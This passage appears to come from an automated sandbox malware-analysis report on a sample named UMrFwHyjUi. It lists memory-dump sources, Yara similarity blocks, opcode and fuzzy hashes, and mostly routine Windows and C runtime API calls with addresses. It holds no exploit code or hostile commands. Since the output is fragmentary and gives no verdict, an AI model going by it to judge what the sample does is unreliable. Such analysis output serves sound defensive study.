                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2133458128-0
                                                                                                                                                                                                                            • Opcode ID: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction ID: 84870491a8d04261862ea8d05ae0ccebbc61a891c73630b256a33adc09a09913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A01F531D24126EBCF05EBA8E8456BD7BB1AF90724F280549F8106B2D2CF749D42C781
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                            • Instruction ID: 05b660717e249a6f870f3868b471e026768dda4750a265f5b0d0d5685e6008bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 792196B6A00DCAAADF18DFBAC9459FDBB766F0C305F954165A111D7541DB348F408710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                            • Instruction ID: 4a339399c0c567593f47ff80118b7ad24a450b14b2e718d896bc57f9d4f1f579
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 962193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB34CF008B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                            • Instruction ID: 9b126d5411be8b910aa58530216a37b53609fbcd1b6d21b09dc2acdb3f4fa061
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB348F408B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                            • Instruction ID: 3184aaab31480a38321e0ab0b3e31c235d80401c9e4a64b0be91c8b0f00e9cd5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 072193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB348F008B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0019CA8B,0019AD89,001969F4,AB531964,?,?,?,?,001B52D0,000000FF), ref: 0019CAA2
                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019CAB0
                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019CAC9
                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0019CA8B,0019AD89,001969F4,AB531964,?,?,?,?,001B52D0,000000FF), ref: 0019CB1B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                            • Opcode ID: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction ID: 358fccb8e432dabd1db1e6376dd2748fdc373ddf668da55287609b9d25111967
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E01F7322087116FEF246BB57C86D6A6B45EB217B5330033DF176524F1EF658D4092C0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1181530324-0
                                                                                                                                                                                                                            • Opcode ID: f576442123b04c527e99995057e5f798a06d57a0fbdba5833e7da996cdf46145
                                                                                                                                                                                                                            • Instruction ID: 97c8c7a352d1610b681c9b17ac3d532278ea59ea4cbf22fa7950bcbf8c4db450
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f576442123b04c527e99995057e5f798a06d57a0fbdba5833e7da996cdf46145
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43112531501B44ABDB34AFBA9406B1D77E4AF14B10F24442EF099D72C2CB34EE80C666
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB531964,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C15
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A3C27
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C49
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction ID: 971c0daa0c5d623321860ab8f1a100f4cc7b17033ad3c30155a1a460c24588f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901DB32944625FFDB159F51DC09FEEBBF8FB04B11F040625F911A26D0DB789940CA40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2583058844-0
                                                                                                                                                                                                                            • Opcode ID: e34bf048b61c1259719f24b5a9ebcdb7e29330d4219f1e2d480e2a365f4dc5d7
                                                                                                                                                                                                                            • Instruction ID: 1dd2e523ecce7ee3fbdf45d2ab30c7c7d5fd777b70bc965f8dbf2bfc740f16fc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e34bf048b61c1259719f24b5a9ebcdb7e29330d4219f1e2d480e2a365f4dc5d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C12A72D0022AABCF21EB64DC45AEE777DAF18304F0141A6FA09B3251DB359F858F50
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00198BBE
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,?,00000002,?,001934CC,?,?), ref: 00198BDD
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C0B
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C66
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 66001078-0
                                                                                                                                                                                                                            • Opcode ID: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction ID: 535d241768c46b54efd244b359c64847758db79de94e223969ed2ac5d6192b5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C412671902A06DBCF24DF65C8819AAB3F4FF1A350B504A2AE457D7A40EB34F984CB71
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3132042578-0
                                                                                                                                                                                                                            • Opcode ID: 0a94c54a7945867de6cfe35b03e58e96b0a908eff489fa3a921db52f6821de8f
                                                                                                                                                                                                                            • Instruction ID: a7b97b62f20c9aca1a033ec2ce92ae997ee49e6bc11f18e5ec099714d78d309a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a94c54a7945867de6cfe35b03e58e96b0a908eff489fa3a921db52f6821de8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29319F31D487909ADB20AF76BC08A0E3FA5FF64761B90163AE454D35B1D774C840CF58
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194903
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194916
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194949
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0019495F
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0019496A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194A3B
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194A4E
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194A81
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194A97
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194AA2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194F7A
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194F8D
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194FC0
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FD6
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001EA072
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 001EA07D
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001EA0B3
                                                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 001EA0BF
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001EA0D3
                                                                                                                                                                                                                              • Part of subcall function 001E5BA4: __getptd_noexit.LIBCMT ref: 001E5BA4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2820776222-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001987C9
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001987D4
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00198842
                                                                                                                                                                                                                              • Part of subcall function 00198925: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0019893D
                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 001987EF
                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00198805
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E87D5
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E87EC
                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 001E87FA
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001E880A
                                                                                                                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 001E881E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 938513278-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue), ref: 0019DBA4
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue,?,?,0019CAB5), ref: 0019DBAE
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0019DBD6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(AB531964,00000000,00000000,74DEF550), ref: 001A9E13
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001AA06E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001AA0B6
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AA159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
